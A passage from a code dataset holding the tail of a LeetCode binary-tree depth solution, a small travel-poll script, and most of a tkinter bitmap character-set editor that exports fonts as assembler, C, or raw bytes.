root: TreeNode\n :rtype: int\n \"\"\"\n if not root: return 0\n queue= [root]\n depth = 1\n while queue:\n queue1 = []\n for node in queue:\n if node.left:\n queue1.append(node.left)\n if node.right:\n queue1.append(node.right)\n queue = queue1\n \n depth += 1\n return depth-1\n\n# Time: O(n)\n# Space: O(n)\n# Difficulty: medium","repo_name":"wenxinjie/leetcode","sub_path":"tree/python/leetcode104_Maximum_Depth_of_Binary_Tree.py","file_name":"leetcode104_Maximum_Depth_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36405964491","text":"responses = {}\n\nname_prompt = \"what's your name? \"\nplace_prompt = \"If you could visit one place in the world, where would you go? 
\"\ncontinue_prompt = \"Would you like to let another person respond?(Y/N) \"\n\nwhile True:\n\tname = input(name_prompt)\n\tplace = input(place_prompt)\n\n\tresponses[name] = place\n\n\trepeat = input(continue_prompt)\n\tif repeat != 'Y':\n\t\tbreak\n\nprint(\"\\n--- Poll Results ---\")\nfor name, place in responses.items():\n\tprint(name.title() + \"'s favorite place is \" + place.title() + \".\")\n","repo_name":"julie98/Python-Crash-Course","sub_path":"chapter_7/dream_vacation.py","file_name":"dream_vacation.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34611204638","text":"from functools import partial\nimport tkinter as tk\nimport tkinter.filedialog as file\nimport tkinter.messagebox as messagebox\nimport os\n\nInfoText = \"\"\"Character Generator v.b.3\nbuild on May 16th, 2023\nby Gabriel Weingardt\n\nFeel free to modify ;)\ngithub.com/0xMAC8205\n\nKnown issues:\n> Draw Box Applying when\n selecting a Character box\"\"\"\n\nToDo = \"\"\"\n- Correct 8x16 Char Export\n\"\"\"\n\n\nclass Main(tk.Tk):\n def __init__(self, mode, carry_file, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.protocol(\"WM_DELETE_WINDOW\", self.exit_protocol)\n self.Path = os.path.abspath(os.path.dirname(__file__)).replace(\"\\\\\", \"/\") + \"/assets\"\n\n self.Mode = mode\n self.X_Select = 0\n self.Y_Select = 0\n\n self.BrushVar = tk.IntVar()\n self.Size = tk.IntVar()\n self.Grid = tk.IntVar()\n self.Drag = tk.IntVar()\n self.Wrap = tk.IntVar()\n self.Hint = tk.IntVar()\n self.Tooltip = tk.IntVar()\n self.ProjectSize = tk.IntVar()\n self.BrushVar.set(2)\n self.ProjectSize.set(0)\n\n self.background = \"#FFFFFF\"\n self.foreground = \"#000000\"\n self.draw_off = \"#FFFFFF\"\n self.draw_on = \"#000000\"\n self.font = \"Arial 12 bold\"\n\n self.Copy = [0 for _ in range(16)]\n\n self.X_Text = []\n self.Y_Text = []\n\n self.File_Formats = []\n\n self.CurrentFile = \"\"\n\n try:\n self.Preset = open(self.Path + \"/settings/settings\", \"rb\")\n\n self.Size.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Grid.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Drag.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Wrap.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Hint.set(int.from_bytes(self.Preset.read(1), \"big\"))\n\n self.Preset.close()\n\n for i in os.listdir(self.Path + \"/custom_formats\"):\n if len(i) > 3 and not i[0] == \".\":\n self.File_Formats.append(i)\n\n self.Format = open(self.Path + \"/settings/theme.txt\", \"r\")\n self.import_code(self.Format.read().splitlines())\n self.Format.close()\n\n except Exception as e:\n print(\"Error in Reading Settings:\\n\", e)\n open(self.Path + \"/settings/settings\", \"w\").close()\n\n self.BrushVar.set(2)\n self.Size.set(16)\n self.Grid.set(1)\n self.Drag.set(1)\n self.Wrap.set(0)\n self.Hint.set(0)\n\n open(self.Path + \"/settings/theme.txt\", \"w\").close()\n\n self.config(bg=self.background)\n\n self.Matrix = []\n self.Characters = {}\n\n self.UpperFrame = tk.Frame(master=self, bg=self.background)\n self.UpperFrame.pack(side=\"top\", fill=\"both\", expand=0)\n self.Frame = tk.Frame(master=self, bg=self.background)\n self.Frame.pack(side=\"bottom\", fill=\"y\", expand=0)\n self.LowerFrame = tk.Frame(master=self.Frame, bg=self.background)\n self.LowerFrame.pack(side=\"bottom\")\n self.InfoBox = tk.Frame(master=self.Frame, bg=self.background)\n self.InfoBox.pack(side=\"bottom\")\n\n self.Options = 
tk.LabelFrame(master=self.LowerFrame, bg=self.background, fg=self.foreground,\n text=\"Options:\", font=self.font,)\n self.Options.pack(side=\"right\", anchor=\"s\", expand=0, fill=\"y\")\n self.DrawFrame = tk.Frame(master=self.LowerFrame, bg=self.background)\n self.DrawFrame.pack(side=\"right\", anchor=\"s\", expand=0, fill=\"y\")\n self.Toolbox = tk.LabelFrame(master=self.LowerFrame, bg=self.background, fg=self.foreground,\n text=\"Brush:\", font=self.font)\n self.Toolbox.pack(side=\"right\", anchor=\"s\", expand=0, fill=\"y\")\n\n self.CurrentCoord = tk.Label(master=self.InfoBox, text=\"Char: 0 | 0x00\", bg=self.background,\n foreground=self.foreground, font=self.font)\n self.CurrentCoord.pack()\n\n self.Draw = DrawBox(master=self.DrawFrame, bg=self.background, size=self.Size.get(), mode=self.Mode,\n background=self.draw_off, foreground=self.draw_on)\n self.Draw.pack()\n\n # Brush Options\n\n self.Brush_White = tk.Radiobutton(master=self.Toolbox, variable=self.BrushVar, value=0, text=\"White\",\n background=self.background, foreground=self.foreground,\n indicatoron=False, command=self.update_brush, font=self.font)\n self.Brush_Black = tk.Radiobutton(master=self.Toolbox, variable=self.BrushVar, value=1, text=\"Black\",\n background=self.background, foreground=self.foreground,\n indicatoron=False, command=self.update_brush, font=self.font)\n self.Brush_Invert = tk.Radiobutton(master=self.Toolbox, variable=self.BrushVar, value=2, text=\"Invert\",\n background=self.background, foreground=self.foreground,\n indicatoron=False, command=self.update_brush, font=self.font)\n self.Brush_Invert.pack(side=\"top\", expand=1, fill=\"both\")\n self.Brush_Black.pack(side=\"top\", expand=1, fill=\"both\")\n self.Brush_White.pack(side=\"top\", expand=1, fill=\"both\")\n\n # Options\n\n self.Invert_Button = tk.Button(master=self.Options, text=\"Invert\", command=self.Draw.invert_screen,\n background=self.background, foreground=self.foreground, font=self.font)\n self.Clear_Button = tk.Button(master=self.Options, text=\"Clear\", command=self.Draw.clear_screen,\n background=self.background, foreground=self.foreground, font=self.font)\n self.Apply_Button = tk.Button(master=self.Options, text=\"Apply\", command=self.apply,\n background=self.background, foreground=self.foreground, font=self.font)\n self.Clear_Button.pack(side=\"top\", expand=1, fill=\"both\")\n self.Invert_Button.pack(side=\"top\", expand=1, fill=\"both\")\n self.Apply_Button.pack(side=\"bottom\", expand=1, fill=\"both\")\n\n self.Menu = tk.Menu(self)\n self.Menu_File = tk.Menu(self.Menu, tearoff=False)\n self.Menu_Options = tk.Menu(self.Menu, tearoff=False)\n self.Menu_Settings = tk.Menu(self.Menu, tearoff=False)\n self.Menu_Export = tk.Menu(self.Menu_File, tearoff=False)\n self.Menu_Help = tk.Menu(self.Menu, tearoff=False)\n\n self.Menu_File.add_command(label=\"New Window\", accelerator=\"Control+N\",\n command=lambda: self.start_project(False))\n self.Menu_File.add_command(label=\"New Project\", accelerator=\"Shift+N\",\n command=lambda: self.start_project(True))\n self.Menu_File.add_separator()\n self.Menu_File.add_command(label=\"Open Project\", accelerator=\"Control+O\", command=self.open)\n self.Menu_File.add_command(label=\"Save Project\", accelerator=\"Control+S\", command=self.save)\n self.Menu_File.add_command(label=\"Save Project As\", accelerator=\"Control+Shift+S\", command=self.save_as)\n self.Menu_File.add_separator()\n self.Menu_File.add_cascade(label=\"Export\", menu=self.Menu_Export)\n self.Menu_File.add_separator()\n 
self.Menu_File.add_command(label=\"Close\", accelerator=\"Control+Q\", command=self.exit_protocol)\n\n self.Menu_Export.add_command(label=\"Assembler\", accelerator=\"Control+E\", command=lambda: self.export(\"asm\"))\n self.Menu_Export.add_command(label=\"C Include\", accelerator=\"Control+Shift+E\", command=lambda: self.export(\"c\"))\n self.Menu_Export.add_command(label=\"Raw Bytes\", command=lambda: self.export(\"out\"))\n\n \"\"\"\n if len(self.File_Formats) > 0:\n self.Menu_Export.add_separator()\n for i in self.File_Formats:\n if len(i) > 3:\n self.Menu_Export.add_command(label=i.split(\".\")[0],\n command=partial(self.export, \"custom\", type_carry=i))\n \"\"\"\n\n self.Menu_Options.add_command(label=\"Copy\", accelerator=\"Control+C\", command=self.copy)\n self.Menu_Options.add_command(label=\"Paste\", accelerator=\"Control+V\", command=self.paste)\n self.Menu_Options.add_separator()\n self.Menu_Options.add_command(label=\"Clear\", command=self.Draw.clear_screen, accelerator=\"Control+X\")\n self.Menu_Options.add_command(label=\"Invert\", command=self.Draw.invert_screen, accelerator=\"Control+Y\")\n self.Menu_Options.add_command(label=\"Apply\", command=self.apply, accelerator=\"Control+A\")\n\n self.Menu_Settings.add_checkbutton(label=\"Big Canvas\", variable=self.Size, onvalue=32, offvalue=16,\n command=self.update_draw, accelerator=\"Control+Plus\")\n self.Menu_Settings.add_checkbutton(label=\"Grid\", variable=self.Grid, onvalue=1, offvalue=0,\n command=self.update_draw, accelerator=\"Control+G\")\n self.Menu_Settings.add_checkbutton(label=\"Cursor Dragging\", variable=self.Drag, onvalue=1, offvalue=0,\n command=self.update_draw)\n self.Menu_Settings.add_separator()\n self.Menu_Settings.add_checkbutton(label=\"Coordinate Hints\", variable=self.Hint,\n onvalue=1, offvalue=0, command=self.update_draw)\n self.Menu_Settings.add_checkbutton(label=\"Cursor Wrapping\", variable=self.Wrap,\n onvalue=1, offvalue=0)\n\n self.Menu_Help.add_command(label=\"Creating a Theme\",\n command=lambda: FileViewer(self.Path + \"/create_theme.txt\"))\n # self.Menu_Help.add_command(label=\"Creating Custom Formats\",\n # command=lambda: FileViewer(self.Path + \"/format_help.txt\"))\n # self.Menu_Help.add_command(label=\"Importing Custom Formats\",\n # command=lambda: FileViewer(self.Path + \"/create_format.txt\"))\n self.Menu_Help.add_separator()\n self.Menu_Help.add_checkbutton(label=\"What is this?\", variable=self.Tooltip)\n self.Menu_Help.add_command(label=\"About\", command=self.about_menu)\n\n self.Menu.add_cascade(label=\"File\", menu=self.Menu_File)\n self.Menu.add_cascade(label=\"Options\", menu=self.Menu_Options)\n self.Menu.add_cascade(label=\"Settings\", menu=self.Menu_Settings)\n self.Menu.add_cascade(label=\"Help\", menu=self.Menu_Help)\n\n self[\"menu\"] = self.Menu\n\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n\n self.bind(\"\", lambda _: self.apply())\n self.bind(\"\", lambda _: self.apply())\n self.bind(\"\", self.Draw.invert_screen)\n self.bind(\"\", self.Draw.clear_screen)\n self.bind(\"\", self.show_grid)\n\n self.bind(\"\", self.exit_protocol)\n self.bind(\"\", self.open)\n self.bind(\"\", self.save)\n self.bind(\"\", self.save_as)\n self.bind(\"\", lambda _: self.start_project(False))\n self.bind(\"\", lambda _: self.start_project(True))\n self.bind(\"\", lambda _: 
self.export(\"asm\"))\n self.bind(\"\", lambda _: self.export(\"c\"))\n\n self.bind(\"\", self.extend_draw)\n self.bind(\"\", self.copy)\n self.bind(\"\", self.paste)\n\n ToolTip(self.Brush_White, \"White Brush.\\nDraws white on selected field\")\n ToolTip(self.Brush_Black, \"Black Brush.\\nDraws black on selected field\")\n ToolTip(self.Brush_Invert, \"Inverted Brush.\\nInverts the selected field\")\n ToolTip(self.Invert_Button, \"Invert Button.\\nInverts the entire draw field\")\n ToolTip(self.Clear_Button, \"Clear Button.\\nClears the entire draw field\")\n ToolTip(self.Apply_Button, \"Apply Button.\\nSets the selected character \\nto the edited character\")\n ToolTip(self.CurrentCoord, \"Coordinate Label.\\nShows the index of selected \\ncharacter in Decimal and Hex\")\n ToolTip(self.DrawFrame, \"Draw field.\\nHere you can edit\\nthe selected character\")\n ToolTip(self.UpperFrame, \"Character list.\\nHere you select one of\\n256 characters to edit\")\n\n self.build_matrix()\n self.Draw.update_screen()\n self.update_draw()\n self.update_brush()\n\n if carry_file:\n self.open(in_file=carry_file)\n\n def exit_protocol(self, event=None):\n try:\n self.check_save_status()\n self.Preset = open(self.Path + \"/settings/settings\", \"wb\")\n self.Preset.write(self.Size.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Grid.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Drag.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Wrap.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Hint.get().to_bytes(1, \"big\"))\n\n self.Preset.close()\n except Exception as e:\n messagebox.showerror(\"Error\", \"Error while saving local settings:\\n{0}\".format(e))\n\n self.destroy()\n\n def save(self, event=None):\n if self.CurrentFile == \"\":\n name_raw = file.asksaveasfilename(confirmoverwrite=True, defaultextension=\".bmf\", title=\"Save As\",\n filetypes=((\"BitMap File\", '*.bmf'), (\"Text File\", \"*.txt\"),\n (\"All Files\", \"*.*\")))\n name = open(name_raw, \"wb\")\n else:\n name = open(self.CurrentFile, \"wb\")\n\n if name:\n name.write(int(self.Mode).to_bytes(1, \"big\"))\n\n for y in range(16):\n for x in range(16):\n for y_ in range(16):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n name.write(int(bin_value, 2).to_bytes(1, \"big\"))\n\n self.CurrentFile = name.name\n self.modified(False)\n name.close()\n\n def save_as(self, event=None):\n self.CurrentFile = \"\"\n self.save()\n\n def open(self, event=None, in_file=None):\n self.check_save_status()\n\n if in_file:\n read = open(in_file, \"rb\")\n else:\n read_raw = file.askopenfilename(defaultextension=\".bmf\",\n filetypes=((\"BitMap File\", '*.bmf'),\n (\"Text File\", \"*.txt\"),\n (\"All Files\", \"*.*\")))\n read = open(read_raw, \"rb\")\n\n if read:\n read.read(1)\n for y in range(16):\n for x in range(16):\n for y_ in range(16):\n value = int.from_bytes(read.read(1), \"big\")\n for x_ in range(8):\n shift_val = bin(value)[2:].zfill(8)[x_:x_+1]\n self.Matrix[y][x].Pixels[x_][y_] = int(shift_val)\n self.select_grid(x, y)\n\n self.CurrentFile = read.name\n self.select_grid(0, 0)\n self.Draw.update_screen()\n self.modified(False)\n read.close()\n\n def export(self, mode, event=None):\n write_raw = file.asksaveasfilename(confirmoverwrite=False, defaultextension=\".\" + mode, title=\"Export As\",\n filetypes=((mode.upper(), \".\" + mode), (\"All Files\", \"*.*\")))\n if write_raw:\n write = open(write_raw, \"w\")\n if mode == \"asm\":\n 
write.write(\"{0}\".format(os.path.basename(self.CurrentFile).split(\".\")[0]))\n # write.write(\"\\n\\t; 8x{0} Character Size | 256 Characters Total\".format(8 * (self.Mode + 1)))\n for y in range(16):\n for x in range(16):\n write.write(\"\\n \\t.byte \")\n buffer = \"\"\n for y_ in range(8 * (self.Mode + 1)):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n buffer += \"$\" + str(hex(int(bin_value, 2)))[2:].zfill(2).upper() + \", \"\n write.write(buffer[:len(buffer)-2])\n write.write(\" ;char 0x{0}, {1}\".format(hex(x + y * 16)[2:].zfill(2).upper(), x + y * 16))\n write.write(\"{0}_end\".format(os.path.basename(self.CurrentFile).split(\".\")[0]))\n\n elif mode == \"c\":\n write.write(\"// {0}\".format(os.path.abspath(self.CurrentFile)))\n write.write(\"\\n// 8x{0} Character Size | 256 Characters Total\".format(8 * (self.Mode + 1)))\n write.write(\"\\n{\")\n for y in range(16):\n for x in range(16):\n write.write(\"\\n \\t\")\n for y_ in range(8 * (self.Mode + 1)):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n write.write(\"0x\" + str(hex(int(bin_value, 2)))[2:].zfill(2).upper() + \", \")\n write.write(\" //Char {0} ; {1}\".format(hex(x + y * 16)[2:].zfill(2).upper(), x + y * 16))\n write.write(\"\\n}\")\n\n elif mode == \"out\":\n write = open(write_raw, \"wb\")\n for y in range(16):\n for x in range(16):\n for y_ in range(8 * (self.Mode + 1)):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n write.write(int(bin_value, 2).to_bytes(1, \"big\"))\n\n write.close()\n\n def copy(self, event=None):\n self.Copy = []\n for y_ in range(16):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[self.Y_Select][self.X_Select].Pixels[x_][y_])\n self.Copy.append(int(bin_value, 2))\n\n def paste(self, event=None):\n for y in range(16):\n txt = str(bin(self.Copy[y]))[2:].zfill(8)\n for x in range(8):\n self.Matrix[self.Y_Select][self.X_Select].Pixels[x][y] = int(txt[x])\n self.select_grid(self.X_Select, self.Y_Select)\n\n def build_matrix(self):\n hex_count_y = 0\n for y in range(18):\n row = []\n hex_count_x = 0\n for x in range(18):\n if x == 0 or x == 17:\n if y != 0 and y != 17:\n txt = tk.Label(master=self.UpperFrame, text=str(hex(hex_count_y)).upper()[2:],\n bg=self.background, fg=self.foreground, font=self.font)\n txt.grid(row=y, column=x)\n if x != 17:\n self.Y_Text.append(txt)\n if x == 17:\n hex_count_y += 1\n\n ToolTip(txt, \"Y Coordinate.\\nThis is the first Hex digit\\n>> 0xY0\")\n\n elif y == 0 or y == 17:\n if x != 0 and x != 17:\n txt = tk.Label(master=self.UpperFrame, text=str(hex(hex_count_x)).upper()[2:],\n bg=self.background, fg=self.foreground, font=self.font)\n txt.grid(row=y, column=x)\n if x != 17:\n self.X_Text.append(txt)\n hex_count_x += 1\n\n ToolTip(txt, \"X Coordinate.\\nThis is the second Hex digit\\n>> 0x0X\")\n else:\n matrix = ImageBox(master=self.UpperFrame, bg=self.draw_off, height=24, width=24,\n relief=\"flat\", bd=1, background=self.draw_off, foreground=self.draw_on)\n matrix.grid(row=y, column=x)\n matrix.bind(\"\", partial(self.select_grid, x - 1, y - 1))\n matrix.bind(\"\", partial(self.select_grid, x - 1, y - 1))\n matrix.bind(\"\", partial(self.select_grid, x - 1, y - 1))\n row.append(matrix)\n if y != 0:\n self.Matrix.append(row)\n\n def update_draw(self):\n for i in range(16):\n self.X_Text[i].config(bg=self.background, fg=self.foreground)\n self.Y_Text[i].config(bg=self.background, 
fg=self.foreground)\n\n self.Draw.Size = self.Size.get()\n self.Draw.config(height=self.Size.get() * 8, width=self.Size.get() * 8)\n self.Draw.Outline = self.Grid.get()\n self.Draw.Drag = self.Drag.get()\n self.select_grid(self.X_Select, self.Y_Select)\n\n def update_brush(self):\n self.Draw.Brush = self.BrushVar.get()\n\n def start_project(self, mode=None, event=None):\n if mode:\n self.check_save_status()\n self.destroy()\n os.system(\"python3 main.py\")\n\n def modified(self, status):\n self.Draw.Modified = status\n self.title(\"Bitmap Editor - {0}\".format(os.path.basename(self.CurrentFile)))\n if status:\n self.title(\"Bitmap Editor - {0} *\".format(os.path.basename(self.CurrentFile)))\n\n def check_save_status(self):\n if self.Draw.Modified:\n if tk.messagebox.askyesno(message=\"Do you want to Save?\"):\n self.save()\n\n def select_grid(self, x, y, event=None):\n if self.Hint.get():\n self.X_Text[self.X_Select].config(bg=self.background, fg=self.foreground)\n self.Y_Text[self.Y_Select].config(bg=self.background, fg=self.foreground)\n self.X_Text[x].config(bg=self.foreground, fg=self.background)\n self.Y_Text[y].config(bg=self.foreground, fg=self.background)\n\n if self.Draw.Applied:\n pass\n\n self.Matrix[self.Y_Select][self.X_Select].load(self.Draw.PixelGrid, mode=self.Mode)\n self.Draw.load(self.Matrix[y][x].Pixels)\n\n self.Matrix[self.Y_Select][self.X_Select].config(relief=\"flat\")\n self.Matrix[y][x].config(relief=\"solid\")\n self.X_Select, self.Y_Select = x, y\n\n hex_number = str(hex(y)[2:]) + str(hex(x)[2:])\n self.CurrentCoord.config(text=\"{0} | 0x{1}\".format(int(hex_number, 16), hex_number.upper()))\n if event and event.num == 2 or event and event.num == 3:\n extern = tk.Toplevel(master=self, height=20, width=20)\n extern.resizable(False, False)\n extern.title(\"{0} | 0x{1}\".format(int(hex_number, 16), hex_number.upper()))\n extern_canvas = tk.Canvas(master=extern, bg=self.draw_off, height=255, width=255, relief=\"solid\", bd=1)\n extern_canvas.pack(expand=1, fill=\"both\")\n\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n fill = self.draw_off\n out = self.draw_on\n if self.Matrix[self.Y_Select][self.X_Select].Pixels[x][y]:\n fill = self.draw_on\n out = self.draw_off\n x_cord = x * 32\n y_cord = y * 32 / (self.Mode + 1)\n extern_canvas.create_rectangle(x_cord, y_cord, x_cord + 32, y_cord + 32 / (self.Mode + 1),\n fill=fill, outline=out, width=0)\n\n self.Draw.update_screen()\n\n def apply(self):\n self.Draw.Applied = True\n self.Matrix[self.Y_Select][self.X_Select].load(self.Draw.PixelGrid, mode=self.Mode)\n self.modified(True)\n\n def show_grid(self, event):\n if self.Grid.get():\n self.Grid.set(0)\n else:\n self.Grid.set(1)\n self.update_draw()\n\n def extend_draw(self, event):\n if self.Size.get() == 32:\n self.Size.set(16)\n else:\n self.Size.set(32)\n self.update_draw()\n\n def cursor(self, event):\n x, y = self.X_Select, self.Y_Select\n if event.keysym == \"Left\" or event.keysym == \"a\":\n x -= 1\n elif event.keysym == \"Right\" or event.keysym == \"d\":\n x += 1\n elif event.keysym == \"Up\" or event.keysym == \"w\":\n y -= 1\n elif event.keysym == \"Down\" or event.keysym == \"s\":\n y += 1\n\n if x < 0:\n x = 15\n if self.Wrap.get():\n y -= 1\n if x > 15:\n x = 0\n if self.Wrap.get():\n y += 1\n if y > 15:\n y = 0\n if y < 0:\n y = 15\n self.select_grid(x, y)\n\n def about_menu(self):\n menu = tk.Toplevel(self)\n menu.resizable(False, False)\n menu.title(\"About\")\n\n textbox = tk.Text(master=menu, height=10, width=30)\n 
textbox.insert(\"end\", InfoText)\n textbox.config(state=\"disabled\")\n textbox.pack(side=\"top\")\n exit_button = tk.Button(master=menu, text=\"Exit\", command=menu.destroy)\n exit_button.pack(side=\"bottom\", expand=0, fill=\"x\")\n\n def import_code(self, code):\n for i in code:\n if len(i) > 1:\n if i == \"[end]\":\n break\n elif not i[0] == \"#\":\n try:\n exec(i)\n except Exception as e:\n print(\"Error while Importing Code: \\n\", e)\n\n\nclass FileViewer(tk.Tk):\n def __init__(self, path, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n self.title(os.path.basename(path))\n\n self.ShowText = tk.Text(master=self, bg=\"#FFFFFF\", height=32, width=160)\n self.ShowText.pack(side=\"top\", expand=1, fill=\"both\")\n\n tk.Button(master=self, text=\"Close\", bg=\"#FFFFFF\",\n command=lambda: self.destroy()).pack(side=\"bottom\", expand=0, fill=\"x\")\n\n file_read = open(path, \"r\")\n for i in file_read.read():\n self.ShowText.insert(\"end\", i)\n file_read.close()\n\n self.ShowText.config(state=\"disabled\")\n\n\nclass ToolTip(object):\n def __init__(self, widget, text):\n widget.bind(\"\", self.showtip)\n widget.bind(\"\", self.hidetip)\n\n self.widget = widget\n self.text = text\n self.window = None\n self.id = None\n self.x = 0\n self.y = 0\n\n def showtip(self, event):\n if self.window or not self.text or not main.Tooltip.get():\n return\n x, y, cx, cy = self.widget.bbox(\"insert\")\n x += self.widget.winfo_rootx() + 57\n y += cy + self.widget.winfo_rooty() + 27\n\n self.window = tk.Toplevel(self.widget)\n self.window.overrideredirect(True)\n self.window.wm_geometry(\"+%d+%d\" % (x, y))\n\n label = tk.Label(self.window, text=self.text, background=\"#FFFFE0\", relief=\"solid\", bd=1, justify=\"left\")\n label.pack(ipadx=1)\n\n def hidetip(self, event):\n win = self.window\n self.window = None\n if win:\n win.destroy()\n\n\nclass DrawBox(tk.Canvas):\n def __init__(self, size, mode, background, foreground, *args, **kwargs):\n tk.Canvas.__init__(self, *args, **kwargs)\n self.background = background\n self.foreground = foreground\n self.Size = size\n self.Mode = mode\n self.X_coord = []\n self.Y_coord = []\n self.Brush = 0\n self.Outline = 1\n self.Drag = 1\n self.Modified = False\n self.Applied = False\n self.Previous_X = -1\n self.Previous_Y = -1\n self.PixelGrid = [[0 for _ in range(16)] for _ in range(8)]\n self.update_coord(size)\n\n self.config(height=size * 8 + 1, width=size * 8 + 1)\n self.bind(\"\", lambda e: self.draw(\"motion\", e))\n self.bind(\"\", lambda e: self.draw(\"click\", e))\n\n def update_coord(self, size):\n self.X_coord.clear()\n self.Y_coord.clear()\n for i in range(8):\n self.X_coord.append(i * size)\n for i in range((self.Mode + 1) * 8):\n self.Y_coord.append(int(i * (size / (self.Mode + 1))))\n\n def draw(self, click, event):\n ex = event.x - (self.Size / 2) # Brush Cursor fine tune\n ey = event.y - (self.Size / (2 * (self.Mode + 1)))\n x = int(min(self.X_coord, key=lambda x_: abs(x_ - (ex - int(self.Size / 16)))) / self.Size)\n y = int((min(self.Y_coord, key=lambda y_: abs(y_ - (ey - int(self.Size / 16)))) /\n (self.Size / 128) / (8 / (self.Size / 16)) / (self.Size / (self.Mode + 1))))\n if click == \"click\" or click == \"motion\" and self.Drag != 0:\n if self.Previous_X != x or self.Previous_Y != y or click == \"click\":\n if self.Brush == 2:\n if self.PixelGrid[x][y]:\n self.PixelGrid[x][y] = 0\n else:\n self.PixelGrid[x][y] = 1\n elif self.Brush:\n self.PixelGrid[x][y] = 1\n else:\n self.PixelGrid[x][y] = 0\n self.update_screen()\n 
self.Previous_X, self.Previous_Y = x, y\n\n def update_screen(self):\n self.delete(\"all\")\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n fill = self.background\n out = self.foreground\n if self.PixelGrid[x][y]:\n fill = self.foreground\n out = self.background\n x_cord = x * self.Size\n y_cord = y * self.Size / (self.Mode + 1)\n self.create_rectangle(x_cord, y_cord, x_cord + self.Size, y_cord + self.Size / (self.Mode + 1),\n fill=fill, outline=out, width=self.Outline)\n\n def clear_screen(self, event=None):\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n self.PixelGrid[x][y] = 0\n self.update_screen()\n\n def invert_screen(self, event=None):\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n if self.PixelGrid[x][y]:\n self.PixelGrid[x][y] = 0\n else:\n self.PixelGrid[x][y] = 1\n self.update_screen()\n\n def load(self, carry):\n self.PixelGrid = carry\n\n\nclass ImageBox(tk.Canvas):\n def __init__(self, background, foreground, *args, **kwargs):\n tk.Canvas.__init__(self, *args, **kwargs)\n self.background = background\n self.foreground = foreground\n self.Pixels = [[0 for _ in range(16)] for _ in range(8)]\n\n def load(self, bitmap, mode):\n # self.Pixels = bitmap\n self.delete(\"all\")\n for y in range((mode + 1) * 8):\n for x in range(8):\n fill_color = self.background\n if bitmap[x][y]:\n fill_color = self.foreground\n self.create_rectangle(x * 3 + 2, (y * 3 + 2) / (mode + 1) + mode,\n x * 3 + 5, (y * 3 + 5) / (mode + 1) + mode,\n fill=fill_color, width=0)\n\n\nclass StartupDialog(tk.Tk):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.protocol(\"WM_DELETE_WINDOW\", self.exit_protocol)\n\n self.closed = False\n self.file = None\n self.ProjectSize = tk.IntVar()\n\n self.Button_Frame = tk.LabelFrame(master=self, text=\"Character Size:\", bg=\"#FFFFFF\")\n self.Button_Frame.pack(side=\"left\", fill=\"both\", expand=0)\n\n self.Action_Frame = tk.Frame(master=self, bg=\"#FFFFFF\")\n self.Action_Frame.pack(side=\"right\", fill=\"both\", expand=0)\n\n self.Button_8 = tk.Radiobutton(master=self.Button_Frame, variable=self.ProjectSize, value=0,\n text=\"8x8 Pixels\", bg=\"#FFFFFF\", justify=\"center\")\n self.Button_16 = tk.Radiobutton(master=self.Button_Frame, variable=self.ProjectSize, value=1,\n text=\"8x16 Pixels\", bg=\"#FFFFFF\", justify=\"center\")\n\n self.Continue_Button = tk.Button(master=self, text=\"Open\", bg=\"#FFFFFF\", command=self.destroy, width=15)\n self.Cancel_Button = tk.Button(master=self, text=\"Cancel\", bg=\"#FFFFFF\", command=self.exit_protocol)\n self.Open_Button = tk.Button(master=self, text=\"Open File\", bg=\"#FFFFFF\", command=self.fileopen)\n\n self.File_Label = tk.Label(master=self, text=\"File: None\\nNew Blank File\", bg=\"#FFFFFF\", justify=\"left\")\n\n self.Button_8.pack(side=\"top\", expand=1, fill=\"both\")\n self.Button_16.pack(side=\"bottom\", expand=1, fill=\"both\")\n\n self.Cancel_Button.pack(side=\"bottom\", expand=1, fill=\"x\", padx=2, pady=2)\n self.Continue_Button.pack(side=\"bottom\", expand=1, fill=\"x\", padx=2, pady=2)\n self.Open_Button.pack(side=\"top\", expand=1, fill=\"x\", padx=2, pady=2)\n self.File_Label.pack(side=\"top\", anchor=\"w\", padx=2, pady=2)\n\n self.Continue_Button.focus()\n\n self.bind(\"\", lambda _: self.destroy())\n self.bind(\"\", self.fileopen)\n self.bind(\"\", self.exit_protocol)\n\n def exit_protocol(self, event=None):\n self.closed = True\n self.destroy()\n\n def fileopen(self, event=None):\n self.file = 
